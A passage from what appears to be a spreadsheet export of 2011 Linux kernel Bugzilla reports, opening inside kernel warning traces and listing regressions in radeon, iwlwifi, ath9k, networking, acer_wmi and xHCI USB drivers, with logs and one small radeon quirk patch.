[&lt;ffffffff8125aaf7&gt;] kobject_put+0x27/0x60 [&lt;ffffffff812ec732&gt;] put_device+0x12/0x20 [&lt;ffffffff81307ab8&gt;] scsi_request_fn+0xa8/0x4e0 [&lt;ffffffff812470d0&gt;] __blk_run_queue+0x30/0x60 [&lt;ffffffff81248f14&gt;] blk_delay_work+0x24/0x40 [&lt;ffffffff810507d1&gt;] process_one_work+0x1a1/0x440 [&lt;ffffffff81050771&gt;] ? process_one_work+0x141/0x440 [&lt;ffffffff815e7ae9&gt;] ? error_exit+0x29/0xb0 [&lt;ffffffff81248ef0&gt;] ? blk_requeue_request+0x60/0x60 [&lt;ffffffff81050f15&gt;] worker_thread+0x2a5/0x380 [&lt;ffffffff81050c70&gt;] ? rescuer_thread+0x200/0x200 [&lt;ffffffff810550be&gt;] kthread+0xae/0xc0 [&lt;ffffffff81067675&gt;] ? trace_hardirqs_on_caller+0x135/0x180 [&lt;ffffffff815e8a34&gt;] kernel_thread_helper+0x4/0x10 [&lt;ffffffff810335ec&gt;] ? T.1044+0x7c/0xd0 [&lt;ffffffff815e7682&gt;] ? retint_restore_args+0xe/0xe [&lt;ffffffff81055010&gt;] ? __init_kthread_worker+0x70/0x70 [&lt;ffffffff815e8a30&gt;] ? gs_change+0xb/0xb ---[ end trace cee58f33c54e791b ]--- ------------[ cut here ]------------ WARNING: at lib/list_debug.c:47 __list_del_entry+0x63/0xd0() Hardware name: Aspire 1510 list_del corruption, ffff88001d73a020-&gt;next is LIST_POISON1 (dead000000100100) Modules linked in: Pid: 310, comm: kworker/0:1 Tainted: G W 2.6.39-rc4 #5 Call Trace: [&lt;ffffffff810379ea&gt;] warn_slowpath_common+0x7a/0xb0 [&lt;ffffffff81037ac1&gt;] warn_slowpath_fmt+0x41/0x50 [&lt;ffffffff81269b83&gt;] __list_del_entry+0x63/0xd0 [&lt;ffffffff81269c01&gt;] list_del+0x11/0x40 [&lt;ffffffff8130ce57&gt;] scsi_device_dev_release_usercontext+0x57/0x140 [&lt;ffffffff815e7ae9&gt;] ? error_exit+0x29/0xb0 [&lt;ffffffff8130ce00&gt;] ? scsi_device_cls_release+0x20/0x20 [&lt;ffffffff810504e6&gt;] execute_in_process_context+0x86/0x90 [&lt;ffffffff8130cdd7&gt;] scsi_device_dev_release+0x17/0x20 [&lt;ffffffff812ecdf2&gt;] device_release+0x22/0x90 [&lt;ffffffff8125ac37&gt;] kobject_release+0x47/0x90 [&lt;ffffffff8125abf0&gt;] ? kobject_del+0x40/0x40 [&lt;ffffffff8125bf96&gt;] kref_put+0x36/0x70 [&lt;ffffffff8125aaf7&gt;] kobject_put+0x27/0x60 [&lt;ffffffff812ec732&gt;] put_device+0x12/0x20 [&lt;ffffffff81307ab8&gt;] scsi_request_fn+0xa8/0x4e0 [&lt;ffffffff812470d0&gt;] __blk_run_queue+0x30/0x60 [&lt;ffffffff81248f14&gt;] blk_delay_work+0x24/0x40 [&lt;ffffffff810507d1&gt;] process_one_work+0x1a1/0x440 [&lt;ffffffff81050771&gt;] ? process_one_work+0x141/0x440 [&lt;ffffffff815e7ae9&gt;] ? error_exit+0x29/0xb0 [&lt;ffffffff81248ef0&gt;] ? blk_requeue_request+0x60/0x60 [&lt;ffffffff81050f15&gt;] worker_thread+0x2a5/0x380 [&lt;ffffffff81050c70&gt;] ? rescuer_thread+0x200/0x200 [&lt;ffffffff810550be&gt;] kthread+0xae/0xc0 [&lt;ffffffff81067675&gt;] ? trace_hardirqs_on_caller+0x135/0x180 [&lt;ffffffff815e8a34&gt;] kernel_thread_helper+0x4/0x10 [&lt;ffffffff810335ec&gt;] ? T.1044+0x7c/0xd0 [&lt;ffffffff815e7682&gt;] ? retint_restore_args+0xe/0xe [&lt;ffffffff81055010&gt;] ? __init_kthread_worker+0x70/0x70 [&lt;ffffffff815e8a30&gt;] ? gs_change+0xb/0xb ---[ end trace cee58f33c54e791c ]--- ------------[ cut here ]------------ WARNING: at lib/list_debug.c:47 __list_del_entry+0x63/0xd0() Hardware name: Aspire 1510 list_del corruption, ffff88001d73a080-&gt;next is LIST_POISON1 (dead000000100100) Modules linked in: Pid: 310, comm: kworker/0:1 Tainted: G W 2.6.39-rc4 #5 Call Trace: [&lt;ffffffff810379ea&gt;] warn_slowpath_common+0x7a/0xb0 [&lt;ffffffff81037ac1&gt;] warn_slowpath_fmt+0x41/0x50 [&lt;ffffffff81269b83&gt;] __list_del_entry+0x63/0xd0 [&lt;ffffffff81269c01&gt;] list_del+0x11/0x40 [&lt;ffffffff8130ce64&gt;] scsi_device_dev_release_usercontext+0x64/0x140 [&lt;ffffffff815e7ae9&gt;] ? error_exit+0x29/0xb0 [&lt;ffffffff8130ce00&gt;] ? scsi_device_cls_release+0x20/0x20 [&lt;ffffffff810504e6&gt;] execute_in_process_context+0x86/0x90 [&lt;ffffffff8130cdd7&gt;] scsi_device_dev_release+0x17/0x20 [&lt;ffffffff812ecdf2&gt;] device_release+0x22/0x90 [&lt;ffffffff8125ac37&gt;] kobject_release+0x47/0x90 [&lt;ffffffff8125abf0&gt;] ? kobject_del+0x40/0x40 [&lt;ffffffff8125bf96&gt;] kref_put+0x36/0x70 [&lt;ffffffff8125aaf7&gt;] kobject_put+0x27/0x60 [&lt;ffffffff812ec732&gt;] put_device+0x12/0x20 [&lt;ffffffff81307ab8&gt;] scsi_request_fn+0xa8/0x4e0 [&lt;ffffffff812470d0&gt;] __blk_run_queue+0x30/0x60 [&lt;ffffffff81248f14&gt;] blk_delay_work+0x24/0x40 [&lt;ffffffff810507d1&gt;] process_one_work+0x1a1/0x440 [&lt;ffffffff81050771&gt;] ? process_one_work+0x141/0x440 [&lt;ffffffff815e7ae9&gt;] ? error_exit+0x29/0xb0 [&lt;ffffffff81248ef0&gt;] ? blk_requeue_request+0x60/0x60 [&lt;ffffffff81050f15&gt;] worker_thread+0x2a5/0x380 [&lt;ffffffff81050c70&gt;] ? rescuer_thread+0x200/0x200 [&lt;ffffffff810550be&gt;] kthread+0xae/0xc0 [&lt;ffffffff81067675&gt;] ? trace_hardirqs_on_caller+0x135/0x180 [&lt;ffffffff815e8a34&gt;] kernel_thread_helper+0x4/0x10 [&lt;ffffffff810335ec&gt;] ? T.1044+0x7c/0xd0 [&lt;ffffffff815e7682&gt;] ? retint_restore_args+0xe/0xe [&lt;ffffffff81055010&gt;] ? __init_kthread_worker+0x70/0x70 [&lt;ffffffff815e8a30&gt;] ? gs_change+0xb/0xb ---[ end trace cee58f33c54e791d ]--- ============================================= [ INFO: possible recursive locking detected ] 2.6.39-rc4 #5 --------------------------------------------- kworker/0:1/310 is trying to acquire lock: ((&amp;(&amp;q-&gt;delay_work)-&gt;work)){+.+...}, at: [&lt;ffffffff8104f540&gt;] wait_on_work+0x0/0x90 but task is already holding lock: ((&amp;(&amp;q-&gt;delay_work)-&gt;work)){+.+...}, at: [&lt;ffffffff81050771&gt;] process_one_work+0x141/0x440 other info that might help us debug this: 2 locks held by kworker/0:1/310: #0: (kblockd){.+.+..}, at: [&lt;ffffffff81050771&gt;] process_one_work+0x141/0x440 #1: ((&amp;(&amp;q-&gt;delay_work)-&gt;work)){+.+...}, at: [&lt;ffffffff81050771&gt;] process_one_work+0x141/0x440 stack backtrace: Pid: 310, comm: kworker/0:1 Tainted: G W 2.6.39-rc4 #5 Call Trace: [&lt;ffffffff8106a19b&gt;] __lock_acquire+0x151b/0x1c60 [&lt;ffffffff8126418d&gt;] ? trace_hardirqs_off_thunk+0x3a/0x3c [&lt;ffffffff8126418d&gt;] ? trace_hardirqs_off_thunk+0x3a/0x3c [&lt;ffffffff8106a939&gt;] lock_acquire+0x59/0x70 [&lt;ffffffff8104f540&gt;] ? wait_on_cpu_work+0xd0/0xd0 [&lt;ffffffff8104f584&gt;] wait_on_work+0x44/0x90 [&lt;ffffffff8104f540&gt;] ? wait_on_cpu_work+0xd0/0xd0 [&lt;ffffffff815e7206&gt;] ? _raw_spin_unlock_irq+0x36/0x60 [&lt;ffffffff8104f6b9&gt;] __cancel_work_timer+0xe9/0x1a0 [&lt;ffffffff8104f77d&gt;] cancel_delayed_work_sync+0xd/0x10 [&lt;ffffffff81249514&gt;] blk_sync_queue+0x24/0x30 [&lt;ffffffff81249536&gt;] blk_cleanup_queue+0x16/0x60 [&lt;ffffffff81307859&gt;] scsi_free_queue+0x9/0x10 [&lt;ffffffff8130ceeb&gt;] scsi_device_dev_release_usercontext+0xeb/0x140 [&lt;ffffffff815e7ae9&gt;] ? error_exit+0x29/0xb0 [&lt;ffffffff8130ce00&gt;] ? scsi_device_cls_release+0x20/0x20 [&lt;ffffffff810504e6&gt;] execute_in_process_context+0x86/0x90 [&lt;ffffffff8130cdd7&gt;] scsi_device_dev_release+0x17/0x20 [&lt;ffffffff812ecdf2&gt;] device_release+0x22/0x90 [&lt;ffffffff8125ac37&gt;] kobject_release+0x47/0x90 [&lt;ffffffff8125abf0&gt;] ? kobject_del+0x40/0x40 [&lt;ffffffff8125bf96&gt;] kref_put+0x36/0x70 [&lt;ffffffff8125aaf7&gt;] kobject_put+0x27/0x60 [&lt;ffffffff812ec732&gt;] put_device+0x12/0x20 [&lt;ffffffff81307ab8&gt;] scsi_request_fn+0xa8/0x4e0 [&lt;ffffffff812470d0&gt;] __blk_run_queue+0x30/0x60 [&lt;ffffffff81248f14&gt;] blk_delay_work+0x24/0x40 [&lt;ffffffff810507d1&gt;] process_one_work+0x1a1/0x440 [&lt;ffffffff81050771&gt;] ? process_one_work+0x141/0x440 [&lt;ffffffff815e7ae9&gt;] ? error_exit+0x29/0xb0 [&lt;ffffffff81248ef0&gt;] ? blk_requeue_request+0x60/0x60 [&lt;ffffffff81050f15&gt;] worker_thread+0x2a5/0x380 [&lt;ffffffff81050c70&gt;] ? rescuer_thread+0x200/0x200 [&lt;ffffffff810550be&gt;] kthread+0xae/0xc0 [&lt;ffffffff81067675&gt;] ? trace_hardirqs_on_caller+0x135/0x180 [&lt;ffffffff815e8a34&gt;] kernel_thread_helper+0x4/0x10 [&lt;ffffffff810335ec&gt;] ? T.1044+0x7c/0xd0 [&lt;ffffffff815e7682&gt;] ? retint_restore_args+0xe/0xe [&lt;ffffffff81055010&gt;] ? __init_kthread_worker+0x70/0x70 [&lt;ffffffff815e8a30&gt;] ? gs_change+0xb/0xb Intel ICH Modem 0000:00:06.1: PCI INT B -&gt; Link[LMCI] -&gt; GSI 21 (level, low) -&gt; IRQ 21 Intel ICH Modem 0000:00:06.1: setting latency timer to 64 usbcore: registered new interface driver snd-usb-audio ALSA device list: #0: NVidia nForce3 with ALC250 at irq 22 #1: NVidia nForce3 Modem at irq 21 Netfilter messages via NETLINK v0.30. nf_conntrack version 0.5.0 (3843 buckets, 15372 max) ip_tables: (C) 2000-2006 Netfilter Core Team ...</t>
  </si>
  <si>
    <t>radeon with modeset option causes oops as secondary adapter (vgaswitcheroo)</t>
  </si>
  <si>
    <t>2011-04-21 23:14 UTC</t>
  </si>
  <si>
    <t>2011-05-04 16:33 UTC</t>
  </si>
  <si>
    <t>33422 34022</t>
  </si>
  <si>
    <t>Created attachment 54942 [details] kernel log System: Lenovo ThinkPad T500 00:02.0 VGA compatible controller: Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller (rev 07) 01:00.0 VGA compatible controller: ATI Technologies Inc Mobility Radeon HD 3650 using vgaswitcheroo Trying to load radeon (as a module or in kernel) with modeset not explicitly disabled causes a kernel NULL pointer dereference if i915 has initialised the fb console already. That behaviour did not occur in 2.6.38, only after upgrading to 2.6.38.3 (haven't had the time to bisect yet). If I disable switching in the BIOS and move to the radeon card as exclusive adapter, everything works fine. with dual graphics stack</t>
  </si>
  <si>
    <t>Wifi LED on Thinkpad X201 (iwlwifi) always blinking since 5ed540a</t>
  </si>
  <si>
    <t>2.6.39-rc</t>
  </si>
  <si>
    <t>2011-04-22 11:30 UTC</t>
  </si>
  <si>
    <t>2011-06-01 12:54 UTC</t>
  </si>
  <si>
    <t>On my Thinkpad X201, since commit 5ed540aecc2aae92d5c97b9a9306a5bf88ad5574 ("iwlwifi: use mac80211 throughput trigger") the behaviour of the Wifi LED has changed in an annoying way. Before, it blinked only if there was data traffic; otherwise it stayed on. After said commit, when joining a WLAN it is turned on and shortly after starts to blink. Then it never stops blinking (until leaving the network). And if there's data traffic it blinks even faster. This is /very/ distracting, and counterintuitive (blinking should only occur on traffic).</t>
  </si>
  <si>
    <t>NULL pointer dereference in ip_fragment</t>
  </si>
  <si>
    <t>2011-04-23 07:51 UTC</t>
  </si>
  <si>
    <t>2011-06-13 17:21 UTC</t>
  </si>
  <si>
    <t>The host is using the ath9k driver. eth0+wlan0 are bridged. Shortly after I start using the wireless network with my macbook, the bug triggers. No idea if it's wireless related, because there's also a rtl8169_rx_interrupt entry in the stacktrace. This is a transcript, since I don't (have/know of) any way to get the backtrace out of a crashed box. IP: ip_fragment+0x52/0x840 Call Trace: &lt;IRQ&gt; br_parse_ip_options br_flood_deliver br_parse_ip_options br_nf_dev_queue_xmit br_nf_post_routing nf_iterate then also: lots of br_flood_deliver lots of br_*_finish one ? rtl8169_interrupt one ? ath9k_ioread32</t>
  </si>
  <si>
    <t>ath9k: regulatory: strange tx power limits</t>
  </si>
  <si>
    <t>2011-04-26 18:37 UTC</t>
  </si>
  <si>
    <t>2011-08-16 17:38 UTC</t>
  </si>
  <si>
    <t>I noticed that the tx power limits for my Atheros AR9285 are quite strange since kernel 2.6.38, though the correct regulatory domain is set. Other wireless adapters are working fine, so this seems to be a problem with the Atheros drivers. excerpt from "iw list": Frequencies: * 2412 MHz [1] (17.0 dBm) * 2417 MHz [2] (17.0 dBm) * 2422 MHz [3] (9.0 dBm) * 2427 MHz [4] (13.0 dBm) * 2432 MHz [5] (13.0 dBm) * 2437 MHz [6] (13.0 dBm) * 2442 MHz [7] (13.0 dBm) * 2447 MHz [8] (13.0 dBm) * 2452 MHz [9] (9.0 dBm) * 2457 MHz [10] (14.0 dBm) * 2462 MHz [11] (14.0 dBm) * 2467 MHz [12] (17.0 dBm) (passive scanning) * 2472 MHz [13] (17.0 dBm) (passive scanning) * 2484 MHz [14] (disabled) Normally 20 dBm tx power should by allowed for channel 1-13 regarding the regulatory domain: country DE: (2400 - 2483 @ 40), (N/A, 20) (5150 - 5250 @ 40), (N/A, 20), NO-OUTDOOR (5250 - 5350 @ 40), (N/A, 20), NO-OUTDOOR, DFS (5470 - 5725 @ 40), (N/A, 26), DFS</t>
  </si>
  <si>
    <t>[REGRESSION] [2.6.39-rc3] Wrong resolution in framebuffer and X Window</t>
  </si>
  <si>
    <t>2011-04-27 19:11 UTC</t>
  </si>
  <si>
    <t>2011-06-23 21:10 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] [2.6.39-rc3] Wrong resolution in framebuffer and X Window Submitter : Maciej Rutecki &lt;maciej.rutecki@gmail.com&gt; Date : 2011-04-17 16:04 Message-ID : 201104171804.04664.maciej.rutecki@gmail.com References : http://marc.info/?l=linux-fbdev&amp;m=130305625114863&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.39-rc4+: oom-killer busy killing tasks</t>
  </si>
  <si>
    <t>2.6.39-rc4+</t>
  </si>
  <si>
    <t>2011-04-27 19:17 UTC</t>
  </si>
  <si>
    <t>2011-05-14 21:48 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.39-rc4+: oom-killer busy killing tasks Submitter : Christian Kujau &lt;lists@nerdbynature.de&gt; Date : 2011-04-22 1:57 Message-ID : alpine.DEB.2.01.1104211841510.18728@trent.utfs.org References : http://marc.info/?l=linux-kernel&amp;m=130343744622331&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Linux 2.6.39-rc4: modprobe lm85 provokes WARNING</t>
  </si>
  <si>
    <t>2011-04-28 19:47 UTC</t>
  </si>
  <si>
    <t>2011-04-30 21:15 UTC</t>
  </si>
  <si>
    <t>Subject : Linux 2.6.39-rc4: modprobe lm85 provokes WARNING Submitter : rob &lt;rob@curates-egg.org&gt; Date : 2011-04-25 17:53 Message-ID : 4DB5B530.8010900@curates-egg.org References : http://marc.info/?l=linux-kernel&amp;m=130375590720141&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Incorrect / missing device id in radeon_atombios.c</t>
  </si>
  <si>
    <t>2.6.38+</t>
  </si>
  <si>
    <t>2011-04-29 09:56 UTC</t>
  </si>
  <si>
    <t>Sampo Laaksonen</t>
  </si>
  <si>
    <t>2012-06-13 14:56 UTC</t>
  </si>
  <si>
    <t>I have an Acer TravelMate 5730, and the scenario described around line 434 in radeon_atombios.c applies to this model as well. The problem is that the 5730 has a different device id than 5730G (at least my machine has). Changing the relevant id from 0x95c4 to 0x9591 fixes everything for me. Without changing the id, HDMI output works only if I turn it off with xrandr and then use DVI (which this laptop doesn't have) and it doesn't even work that well then, I also get lots of invalid EDID spam in dmesg. ... Apr 28 23:00:26 localhost kernel: [ 3476.326407] [drm:radeon_dvi_detect] *ERROR* DVI-I-1: probed a monitor but no|invalid EDID Apr 28 23:02:19 localhost kernel: [ 3589.819736] [drm:radeon_dvi_detect] *ERROR* HDMI-A-1: probed a monitor but no|invalid EDID Apr 28 23:04:02 localhost kernel: [ 3692.619727] [drm:radeon_dvi_detect] *ERROR* DVI-I-1: probed a monitor but no|invalid EDID Apr 28 23:05:24 localhost kernel: [ 3774.783055] [drm:radeon_dvi_detect] *ERROR* HDMI-A-1: probed a monitor but no|invalid EDID ... This patch fixes the problems mentioned above. It just copies the entry for 5730G and changes the device id. diff --git a/drivers/gpu/drm/radeon/radeon_atombios.c b/drivers/gpu/drm/radeon/radeon_atombios.c index f5d12fb..d706df5 100644 --- a/drivers/gpu/drm/radeon/radeon_atombios.c +++ b/drivers/gpu/drm/radeon/radeon_atombios.c @@ -451,6 +451,18 @@ static bool radeon_atom_apply_quirks(struct drm_device *dev, } } + /* Same as above, but for Acer Travelmate 5730 */ + if ((dev-&gt;pdev-&gt;device == 0x9591) &amp;&amp; + (dev-&gt;pdev-&gt;subsystem_vendor == 0x1025) &amp;&amp; + (dev-&gt;pdev-&gt;subsystem_device == 0x013c)) { + if ((*connector_type == DRM_MODE_CONNECTOR_DVII) &amp;&amp; + (supported_device == ATOM_DEVICE_DFP1_SUPPORT)) { + /* actually it's a DVI-D port not DVI-I */ + *connector_type = DRM_MODE_CONNECTOR_DVID; + return false; + } + } + /* XFX Pine Group device rv730 reports no VGA DDC lines * even though they are wired up to record 0x93 */</t>
  </si>
  <si>
    <t>2011-04-29 16:06 UTC</t>
  </si>
  <si>
    <t>I have the issue that since switching to Radeon KMS neither in-kernel-suspend nor TuxOnIce - that I do not use anymore currently - hibernation aborts due to lack of free memory when I have more than just 2-3 applications open although I have 2 GB of RAM in my ThinkPad T42. For further details please see: Bug #30482 - try harder to free enough memory / improve image size autotuning According to Rafael "The problem is a consequence of bugs in device drivers that shouldn't allocate memory in their suspend/resume routines _at_ _all_. So, a more fundamental fix would be to modify drivers so that they use suspend/hibernate notifiers for allocating memory. IOW, you should complain to the developers of the drivers that cause problems to happen." (see https://bugzilla.kernel.org/show_bug.cgi?id=30482#c7) While I am not completely sure that it is the Radeon DRM/KMS driver allocating memory additionally memory during hibernation cycle having this issue since switching to KMS points at that. Currently I am using 2.6.38.4 with gallium userspace: martin@shambhala:~&gt; glxinfo | grep OpenGL OpenGL vendor string: X.Org R300 Project OpenGL renderer string: Gallium 0.4 on ATI RV350 OpenGL version string: 2.1 Mesa 7.10.2 OpenGL shading language version string: 1.20 OpenGL extensions: martin@shambhala:~&gt; xdpyinfo | grep version version number: 11.0 X.Org version: 1.10.1 but this happened with earlier versions as well.</t>
  </si>
  <si>
    <t>acer_wmi: "Unable to detect available WMID devices" on Travelmate 5735Z-452G32Mnss</t>
  </si>
  <si>
    <t>2.6.39-rc5</t>
  </si>
  <si>
    <t>2011-04-30 17:38 UTC</t>
  </si>
  <si>
    <t>Melchior FRANZ</t>
  </si>
  <si>
    <t>2011-05-30 08:39 UTC</t>
  </si>
  <si>
    <t>Created attachment 55992 [details] dmesg and acpidump On an Acer Travelmate 5735Z-452G32Mnss acer_wmi fails to find available WMID devices: $ dmesg|grep -i acer DMI: Acer TM5735/BA51_MV, BIOS V1.04 09/23/2010 acer_wmi: Acer Laptop ACPI-WMI Extras acer_wmi: Unable to detect available WMID devices debug_dump_wdg=1 shows the following info, whereby numbers in angle brackets represent the hex code of a single character. F6CB5C3C-9CAE-4EBD-B577-931EA32A2CC0: object_id: MX notify_id: 4D reserved: 58 instance_count: 1 flags: 0x2 ACPI_WMI_METHOD F28A9357-CF4B-4A1A-8893-BB1F58EEA1AF: object_id: Ñ notify_id: D1 reserved: 00 instance_count: 1 flags: 0x8 ACPI_WMI_EVENT 05901221-D566-11D1-B2F0-00A0C9062910: object_id: XM notify_id: 58 reserved: 4D instance_count: 1 flags: 0x0 95764E09-FB56-4E83-B31A-37761F60994A: object_id: AA notify_id: 41 reserved: 41 instance_count: 1 flags: 0x1 ACPI_WMI_EXPENSIVE 6AF4F258-B401-42FD-BE91-3D4AC2D7C0D3: object_id: BA notify_id: 42 reserved: 41 instance_count: 1 flags: 0x2 ACPI_WMI_METHOD CC1A61AC-4256-41A3-B9E0-05A445ADE2F5: object_id: &lt;80&gt; notify_id: 80 reserved: 00 instance_count: 1 flags: 0x8 ACPI_WMI_EVENT E78C4453-0227-4861-9EDE-F5600B4A3D39: object_id: BB notify_id: 42 reserved: 42 instance_count: 1 flags: 0x2 ACPI_WMI_METHOD AAE04F7B-B3C5-4865-95D6-9FAC7FF3E92B: object_id: BC notify_id: 42 reserved: 43 instance_count: 1 flags: 0x2 ACPI_WMI_METHOD CFF94C79-6C77-4AF7-AC56-7DD0CE01C997: object_id: BD notify_id: 42 reserved: 44 instance_count: 1 flags: 0x2 ACPI_WMI_METHOD 79772EC5-04B1-4BFD-843C-61E7F77B6CC9: object_id: BE notify_id: 42 reserved: 45 instance_count: 1 flags: 0x2 ACPI_WMI_METHOD A7C9A0B7-4C9D-4C72-83BB-53A3459171DF: object_id: BF notify_id: 42 reserved: 46 instance_count: 1 flags: 0x2 ACPI_WMI_METHOD 653A064F-A23A-485F-B3D9-13F6532A0182: object_id: BG notify_id: 42 reserved: 47 instance_count: 1 flags: 0x2 ACPI_WMI_METHOD 5923DD45-0480-4ED5-B61A-C9EC6C90E26A: object_id: BH notify_id: 42 reserved: 48 instance_count: 1 flags: 0x2 ACPI_WMI_METHOD DB85B1A7-069A-4ABB-A2B5-D186A21B80F1: object_id: &lt;81&gt; notify_id: 81 reserved: 00 instance_count: 1 flags: 0x8 ACPI_WMI_EVENT 36916B91-1A64-4583-84D0-53830FB9108D: object_id: &lt;82&gt; notify_id: 82 reserved: 00 instance_count: 1 flags: 0x8 ACPI_WMI_EVENT 676AA15E-6A47-4D9F-A2CC-1E6D18D14026: object_id: Œ notify_id: BC reserved: 00 instance_count: 1 flags: 0x8 ACPI_WMI_EVENT 61EF69EA-865C-4BC3-A502-A0DEBA0CB531: object_id: AA notify_id: 41 reserved: 41 instance_count: 1 flags: 0x2 ACPI_WMI_METHOD 05901221-D566-11D1-B2F0-00A0C9062910: object_id: AB notify_id: 41 reserved: 42 instance_count: 1 flags: 0x0 FAAA1397-1188-448F-8516-9A07987DD38A: object_id: BI notify_id: 42 reserved: 49 instance_count: 1 flags: 0x2 ACPI_WMI_METHOD Full dmesg output and acpi dump attached.</t>
  </si>
  <si>
    <t>Hard hang arising from TCP/IP related bug in 2.6.39-rc4</t>
  </si>
  <si>
    <t>2011-05-01 17:32 UTC</t>
  </si>
  <si>
    <t>2011-05-14 21:47 UTC</t>
  </si>
  <si>
    <t>Created attachment 56082 [details] kernel crash log via dmesg I did a git-update of linus git tree on 27 Apr 2011, built the new kernel image. Ever since using the new image, I have been *consistently* getting many crashes - especially whenever my google chrome is retoring all its previous session connection. Two crashes (entire system freezes) are shown in attachment. Ever since I have revert to previous version - as booting up twice and consistently twice it will fail within a few minutes after Chrome is used. v2.6.39-rc4-245-g4175242 Previously working version: 2.6.38-rc2+. Did not test anything between 2.6.38-rc2+ and 2.6.39-rc3, and 2.6.39-rc3 failed for me in other ways as well. (http://bugzilla.kernel.org/show_bug.cgi?id=33272)</t>
  </si>
  <si>
    <t>MCEUSB remotes don't work with USB 3.0 ports</t>
  </si>
  <si>
    <t>2.6.38.4</t>
  </si>
  <si>
    <t>2011-05-01 23:48 UTC</t>
  </si>
  <si>
    <t>Aaron Barany</t>
  </si>
  <si>
    <t>2011-06-11 11:01 UTC</t>
  </si>
  <si>
    <t>After upgrading from kernel 2.6.38.3 to 2.6.38.4, my MCEUSB remote that was plugged into a USB 3.0 port stopped working. It shows up in lsusb, but it is otherwise unrecognized and doesn't create /dev/lirc0 device or entry in /sys/class/rc. If I plug it into a USB 2.0 port, then it is recognized again. Also, I tried a USB flash drive, mouse, and USB network card in the same USB 3.0 port, and all of them worked fine. For some reason, it's just the MCEUSB remote that fails to work. Here's the errors that get logged when I try to use my remote in the USB 3.0 port: May 1 16:22:53 localhost kernel: [ 461.352298] xhci_hcd 0000:02:00.0: ERROR: unexpected command completion code 0x11. May 1 16:22:53 localhost kernel: [ 461.352304] usb 2-3: can't set config #1, error -22 Output from lsusb: Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 004 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 006 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 007 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 008 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 002 Device 009: ID 0cf3:9170 Atheros Communications, Inc. AR9170 802.11n Bus 005 Device 006: ID 1784:0011 TopSeed Technology Corp. Bus 005 Device 005: ID 04f3:0212 Elan Microelectronics Corp. Laser Mouse Bus 006 Device 003: ID 047d:2043 Kensington Bus 002 Device 010: ID 046d:c21a Logitech, Inc. Precision Gamepad Output from lspci: 00:00.0 Host bridge: Advanced Micro Devices [AMD] RS880 Host Bridge 00:02.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (ext gfx port 0) 00:09.0 PCI bridge: Advanced Micro Devices [AMD] RS780/RS880 PCI to PCI bridge (PCIE port 4) 00:0a.0 PCI bridge: Advanced Micro Devices [AMD] RS780/RS880 PCI to PCI bridge (PCIE port 5) 00:11.0 SATA controller: ATI Technologies Inc SB700/SB800 SATA Controller [AHCI mode] (rev 40) 00:12.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller 00:12.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller 00:13.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller 00:13.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller 00:14.0 SMBus: ATI Technologies Inc SBx00 SMBus Controller (rev 41) 00:14.1 IDE interface: ATI Technologies Inc SB700/SB800 IDE Controller (rev 40) 00:14.2 Audio device: ATI Technologies Inc SBx00 Azalia (Intel HDA) (rev 40) 00:14.3 ISA bridge: ATI Technologies Inc SB700/SB800 LPC host controller (rev 40) 00:14.4 PCI bridge: ATI Technologies Inc SBx00 PCI to PCI Bridge (rev 40) 00:14.5 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI2 Controller 00:15.0 PCI bridge: ATI Technologies Inc Device 43a0 00:15.1 PCI bridge: ATI Technologies Inc Device 43a1 00:16.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller 00:16.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller 00:18.0 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor HyperTransport Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Miscellaneous Control 00:18.4 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Link Control 01:00.0 VGA compatible controller: ATI Technologies Inc RV730 PRO [Radeon HD 4650] 01:00.1 Audio device: ATI Technologies Inc RV710/730 02:00.0 USB Controller: NEC Corporation uPD720200 USB 3.0 Host Controller (rev 03) 03:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 03) 04:0e.0 FireWire (IEEE 1394): Texas Instruments TSB43AB23 IEEE-1394a-2000 Controller (PHY/Link) 05:00.0 IDE interface: JMicron Technology Corp. JMB368 IDE controller 06:00.0 Network controller: RaLink RT2860</t>
  </si>
  <si>
    <t>Unexpected behaviour when switching video cards with vga_switcheroo</t>
  </si>
  <si>
    <t>2.6.39-rc5+ (1be6a1f89f131e9c3d22f819ec542be9cda8c9e3)</t>
  </si>
  <si>
    <t>2011-05-02 22:39 UTC</t>
  </si>
  <si>
    <t>Igor Murzov</t>
  </si>
  <si>
    <t>2011-05-19 07:27 UTC</t>
  </si>
  <si>
